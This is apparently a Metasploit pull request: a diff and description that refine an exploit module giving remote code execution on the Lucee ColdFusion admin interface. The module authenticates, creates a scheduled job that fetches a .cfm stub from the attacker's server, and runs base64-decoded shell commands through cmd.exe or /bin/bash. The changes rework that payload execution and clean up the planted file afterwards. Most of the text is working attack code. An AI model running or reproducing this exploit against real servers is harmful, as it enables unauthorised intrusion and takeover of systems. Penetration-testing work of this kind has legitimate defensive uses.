### PR TITLE
Pr/collab/17638

### DIFF
--- a/documentation/modules/exploit/multi/http/lucee_scheduled_job.md
+++ b/documentation/modules/exploit/multi/http/lucee_scheduled_job.md
@@ -214,7 +214,6 @@ msf6 exploit(multi/http/lucee_scheduled_job) > run
 [*] Exploit completed, but no session was created.
 ```
 ## Caveats
-There are a few caveats worth mentioning that are inherent to Lucees implementation of ColdFusion
- - ColdFusion does not reliably execute staged payloads appropriately
+There are a few caveats worth mentioning that are inherent to Lucee's implementation of ColdFusion
  - When a shell command returns multiple lines of output, coldfusion may limit the amount that is returned; i.e. it
    will return the full value of an `ls` command, but it may not return the full value of `netstat`

--- a/modules/exploits/multi/http/lucee_scheduled_job.rb
+++ b/modules/exploits/multi/http/lucee_scheduled_job.rb
@@ -303,13 +303,13 @@ class MetasploitModule < Msf::Exploit::Remote
     when :windows_cmd
       <<~CFM.gsub(/^\s+/, '').tr("\n", '')
         <cfscript>
-            cfexecute(name="powershell.exe", arguments="-EncodedCommand #{Base64.strict_encode64(payload.encoded.encode('utf-16le'))}",timeout=0);
+            cfexecute(name="cmd.exe", arguments="/c " & toString(binaryDecode("#{Base64.strict_encode64(payload.encoded)}", "base64")),timeout=5);
         </cfscript>
       CFM
     when :unix_cmd
       <<~CFM.gsub(/^\s+/, '').tr("\n", '')
         <cfscript>
-            cfexecute(name="/bin/bash", arguments="-c 'echo '#{Base64.strict_encode64(payload.encoded)}' | base64 -d | /bin/bash'",timeout=5);
+            cfexecute(name="/bin/bash", arguments=["-c", toString(binaryDecode("#{Base64.strict_encode64(payload.encoded)}", "base64"))],timeout=5);
         </cfscript>
       CFM
     end

--- a/modules/exploits/multi/http/lucee_scheduled_job.rb
+++ b/modules/exploits/multi/http/lucee_scheduled_job.rb
@@ -142,7 +142,11 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     })
 
-    unless auth && auth.code == 200 && auth.body.include?('nav_Security')
+    unless auth
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+
+    unless auth.code == 200 && auth.body.include?('nav_Security')
       fail_with(Failure::NoAccess, 'Unable to authenticate. Please double check your credentials and try again.')
     end
 

--- a/modules/exploits/multi/http/lucee_scheduled_job.rb
+++ b/modules/exploits/multi/http/lucee_scheduled_job.rb
@@ -4,6 +4,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::Retry
+  include Msf::Exploit::FileDropper
   require 'base64'
 
   def initialize(info = {})
@@ -18,9 +19,6 @@ class MetasploitModule < Msf::Exploit::Remote
           when accessed. The payload is uploaded as a cfm file when queried by the target server. When executed,
           the payload will run as the user specified during the Lucee installation. On Windows, this is a service account;
           on Linux, it is either the root user or lucee.
-
-          NOTE: Lucee's implementation of ColdFusion does not handle staged payloads well. Use them at your own
-          discretion.
         },
         'Targets' => [
           [
@@ -28,10 +26,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => 'win',
               'Arch' => ARCH_CMD,
-              'Type' => :windows_cmd,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/windows/generic'
-              }
+              'Type' => :windows_cmd
             }
           ],
           [
@@ -39,10 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => 'unix',
               'Arch' => ARCH_CMD,
-              'Type' => :unix_cmd,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/generic'
-              }
+              'Type' => :unix_cmd
             }
           ]
         ],
@@ -83,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
         Opt::RPORT(8888),
         OptString.new('PASSWORD', [false, 'The password for the administrative interface']),
         OptString.new('TARGETURI', [true, 'The path to the admin interface.', '/lucee/admin/web.cfm']),
-        OptInt.new('PAYLOAD_DEPLOY_DELAY', [false, 'Time in seconds to wait before attempting to access the payload', 20]),
+        OptInt.new('PAYLOAD_DEPLOY_TIMEOUT', [false, 'Time in seconds to wait for access to the payload', 20]),
       ]
     )
     deregister_options('URIPATH')
@@ -96,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
     start_service({
       'Uri' => {
         'Proc' => proc do |cli, req|
-          print_status("#{peer} - Payload request received: #{req.uri}")
+          print_status("Payload request received for #{req.uri} from #{cli.peerhost}")
           send_response(cli, cfm_stub)
         end,
         'Path' => '/' + payload_base + '.cfm'
@@ -117,7 +109,6 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     # Removes the scheduled job
     #
-
     print_status('Removing scheduled job ' + payload_base)
     cleanup_request = send_request_cgi({
       'method' => 'POST',
@@ -149,14 +140,13 @@ class MetasploitModule < Msf::Exploit::Remote
         'rememberMe' => 's',
         'submit' => 'submit'
       }
-
     })
 
-    if auth && auth.code == 200 && auth.body.include?('nav_Security')
-      print_good('Authenticated Successfully')
-    else
+    unless auth && auth.code == 200 && auth.body.include?('nav_Security')
       fail_with(Failure::NoAccess, 'Unable to authenticate. Please double check your credentials and try again.')
     end
+
+    print_good('Authenticated successfully')
   end
 
   def create_job(payload_base)
@@ -186,12 +176,16 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, 'Unable to create job') unless create_job.code == 302
 
     print_good('Job ' + payload_base + ' created successfully')
+    job_file_path = file_path = webroot
+    fail_with(Failure::UnexpectedReply, 'Could not identify the web root') if job_file_path.blank?
 
     case target['Type']
     when :unix_cmd
-      file_path = "#{webroot.gsub('/', '//')}//"
+      file_path << '/'
+      job_file_path = "#{job_file_path.gsub('/', '//')}//"
     when :windows_cmd
-      file_path = "#{webroot.gsub('\\', '\\\\')}\\"
+      file_path << '\\'
+      job_file_path = "#{job_file_path.gsub('\\', '\\\\')}\\"
     end
     update_job = send_request_cgi({
       'method' => 'POST',
@@ -214,7 +208,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'proxyuser' => '',
         'proxypassword' => '',
         'publish' => 'true',
-        'file' => "#{file_path}#{payload_base}.cfm",
+        'file' => "#{job_file_path}#{payload_base}.cfm",
         'start_day' => '01',
         'start_month' => '02',
         'start_year' => '2023',
@@ -236,6 +230,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     fail_with(Failure::Unreachable, 'Could not connect to the web service') if update_job.nil?
     fail_with(Failure::UnexpectedReply, 'Unable to update job') unless update_job.code == 302 || update_job.code == 200
+    register_files_for_cleanup("#{file_path}#{payload_base}.cfm")
     print_good('Job ' + payload_base + ' updated successfully')
   end
 
@@ -261,31 +256,31 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good('Job ' + payload_base + ' executed successfully')
 
     payload_response = nil
-
-    retry_until_truthy(timeout: datastore['PAYLOAD_DEPLOY_DELAY']) do
+    retry_until_truthy(timeout: datastore['PAYLOAD_DEPLOY_TIMEOUT']) do
       print_status('Attempting to access payload...')
       payload_response = send_request_cgi(
         'uri' => '/' + payload_base + '.cfm',
         'method' => 'GET'
       )
-      if payload_response.nil? || (payload_response && payload_response.code == 200 && payload_response.body.exclude?('Error')) || (payload_response.code == 500)
-        break
-      else
-        next
-      end
+      payload_response.nil? || (payload_response && payload_response.code == 200 && payload_response.body.exclude?('Error')) || (payload_response.code == 500)
     end
 
     # Unix systems tend to return a 500 response code when executing a shell. Windows tends to return a nil response, hence the check for both.
-
     fail_with(Failure::Unknown, 'Unable to execute payload') unless payload_response.nil? || payload_response.code == 200 || payload_response.code == 500
 
     if payload_response.nil?
-      print_status('No response from ' + payload_base + '.cfm Check your listener!')
+      print_status('No response from ' + payload_base + '.cfm' + (session_created? ? '' : ' Check your listener!'))
     elsif payload_response.code == 200
       print_good('Received 200 response from ' + payload_base + '.cfm')
-      print_good('Output: ' + payload_response.body)
+      output = payload_response.body.strip
+      if output.include?("\n")
+        print_good('Output:')
+        print_line(output)
+      elsif output.present?
+        print_good('Output: ' + output)
+      end
     elsif payload_response.code == 500
-      print_status('Received 500 response from ' + payload_base + '.cfm. Check your listener!')
+      print_status('Received 500 response from ' + payload_base + '.cfm' + (session_created? ? '' : ' Check your listener!'))
     end
   end
 
@@ -294,7 +289,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path)
     })
-    return res.get_html_document.at('[text()*="Webroot"]').next.next.text
+    return nil unless res
+
+    res.get_html_document.at('[text()*="Webroot"]')&.next&.next&.text
   end
 
   def cfm_stub


### PR DESCRIPTION
This makes a few changes to your lucee scheduled job rce module.

1. It added automatic cleanup for the CFM file that gets written to disk so we're not leaving artifacts on the file system.
2. It fails with an unreachable error instead of no-access when the rport is incorrect
3. Switches how the payloads are executed
    1. Coldfusion is now used to decode the base64 data. On linux that means that `base64` does not need to be in the path any more which is nice.
    2. On Windows, `cmd.exe` is used to execute the payload. ARCH_CMD payloads are for cmd.exe and powershell.exe has some subtle differences that could yield unexpected results.
    3. On Linux, a proper array of arguments is used for `cfexecute`. This means that the string isn't tokenized and fixes cases where things would need to be escaped otherwise due to Coldfusion decoding the base64 data now.
4. Renamed `PAYLOAD_DEPLOY_DELAY` to `PAYLOAD_DEPLOY_TIMEOUT` since it's a timeout now and not a delay.
5. Removed the note about staged payloads not working.
6. Cleaned up how the output is displayed a bit. If the output is one line, it's printed on one line. If the output is multiple lines it's printed on multiple lines without the "Output:" header. This means that text tables will still be aligned.

I tested a few payloads, both of the generic variety with output and stagers. All payloads worked as I would expect them too. Are you still running into issues where staged payloads aren't working? If so what payload and target combination are you using? I'd like to investigate that more if you're still having issues.

If these changes look good to you, all that would be left to do would be to update the output in the docs to reflect these changes and I can land this.

Thanks alot for your help and patience on this! Let me know if any of the changes don't make sense.